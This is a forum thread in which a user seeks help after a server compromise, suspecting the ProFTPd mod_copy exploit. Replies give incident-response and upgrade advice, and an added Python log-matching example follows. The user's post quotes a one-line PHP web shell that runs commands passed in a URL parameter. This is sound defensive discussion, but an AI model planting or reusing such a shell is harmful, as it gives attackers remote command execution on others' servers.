My server has been hacked help

Hi everyone, I logged in to my server today and I see a new file was created. I don’t know who created this file.
Name of the file: d.php. Content of the file:
proftpd <?php passthru($_GET['cmd']);echo 'm3rg3';?>
And I found a Perl backdoor. Can anyone help me? I’m using Webmin and Ubuntu.
I see in the log a lot of attacks from China. Can anyone explain to me what happened?

Howdy,

Yeah, unfortunately, that kind of thing can happen. It’s likely that the attacker broke in through a vulnerability in a web app, or maybe they guessed one of the passwords for an account in your web app.

First, you’ll want to look around and find any files that don’t belong there.

You can then look at their timestamps, and match that to activity in the Apache access log for that domain.

That may help you identify how they broke in.

You’d definitely want to make sure your web app is fully up to date, along with any plugins it’s running.

-Eric
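
One way to carry out the timestamp-to-access-log matching suggested above, as an added example that is not part of any post in this thread. The log lines, client addresses and file time are constructed, and the function names are hypothetical.

```python
import re
from datetime import datetime, timedelta, timezone

# Prefix of Apache common/combined log lines: host ident user [time] "request" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')

def parse_line(line):
    """Return (client, time, request, status), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    try:
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return m.group(1), when, m.group(3), int(m.group(4))

def requests_near(lines, file_time, window=timedelta(minutes=5)):
    """Requests logged within +/- window of a suspicious file's timestamp."""
    recs = [r for r in map(parse_line, lines) if r]
    return [r for r in recs if abs(r[1] - file_time) <= window]

def requests_for(lines, name):
    """Every request whose path ends in the suspicious file name, in time order."""
    recs = sorted((r for r in map(parse_line, lines) if r), key=lambda r: r[1])
    return [r for r in recs if re.search(r"^\S+ \S*/%s(\?| |$)" % re.escape(name), r[2])]

# Constructed sample log (documentation-range addresses, not taken from the thread).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2015:00:10:02 +0200] "GET /index.html HTTP/1.1" 200 5120
203.0.113.7 - - [19/Jul/2015:00:39:05 +0200] "GET /d.php HTTP/1.1" 200 31
203.0.113.7 - - [19/Jul/2015:00:39:40 +0200] "GET /d.php?cmd=id HTTP/1.1" 200 72
this line is truncated or corrupt
198.51.100.4 - - [19/Jul/2015:03:15:00 +0200] "GET /d.php?cmd=id HTTP/1.1" 200 72
""".splitlines()

# Constructed timestamp standing in for the file's mtime; on a live system use
# datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc). Check ctime
# as well, since mtime can be reset by whoever wrote the file.
FILE_TIME = datetime(2015, 7, 18, 22, 38, 50, tzinfo=timezone.utc)

if __name__ == "__main__":
    for client, when, request, status in requests_near(SAMPLE_LOG, FILE_TIME):
        print("near file time:", client, when.isoformat(), request, status)
    for client, when, request, status in requests_for(SAMPLE_LOG, "d.php"):
        print("touched d.php: ", client, when.isoformat(), request, status)
```

Comparing timezone-aware datetimes keeps the match correct when the log's offset differs from the one used for the file time.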

Hi,

Drop me a line on Skype tomorrow (Monday) and I’ll see what I can do to help you.

Best Regards, Peter Knowles TPN Solutions

Email: pknowles@tpnsolutions.com
Phone: 604-782-9342
Skype: tpnsupport
Website: http://www.tpnsolutions.com



Hi, thanks for the reply. I know, but I’m not using any web app, and I think I found the exploit: it’s a ProFTPd exploit.
ProFTPd 1.3.5 - File Copy - Exploits
http://bugs.proftpd.org/show_bug.cgi?id=4169
Actually, I disabled proftpd.
Last proftpd log:
2015-07-19 00:38:22,950 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session opened.
2015-07-19 00:38:23,441 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): USER ftpuser: no such user found from 59.38.97.174 [59.38.97.174] to ::ffff:213.136.72.38:21
2015-07-19 00:43:22,643 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Login timeout exceeded, disconnected
2015-07-19 00:43:22,685 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): Session timed out, disconnected
2015-07-19 00:43:22,688 Myserverhost proftpd[13085] Myserverhost (59.38.97.174[59.38.97.174]): FTP session closed.

Howdy,

It sounds like you disabled ProFTPd – that’s good if you think that’s the issue. You may want to make sure that mod_copy is disabled in ProFTPd.

What distro/version is it that you’re using there though?

-Eric

Operating system : Ubuntu Linux 13.10
Webmin version : 1.760

Ah, Ubuntu 13.10 reached its end of life over a year ago. So it’s no longer receiving any updates, including security updates.

There are likely a number of vulnerabilities on your server now.

We’d highly recommend upgrading to a current distribution.

When using Ubuntu, we recommend the Ubuntu LTS releases, as they’re supported for 5 years.

-Eric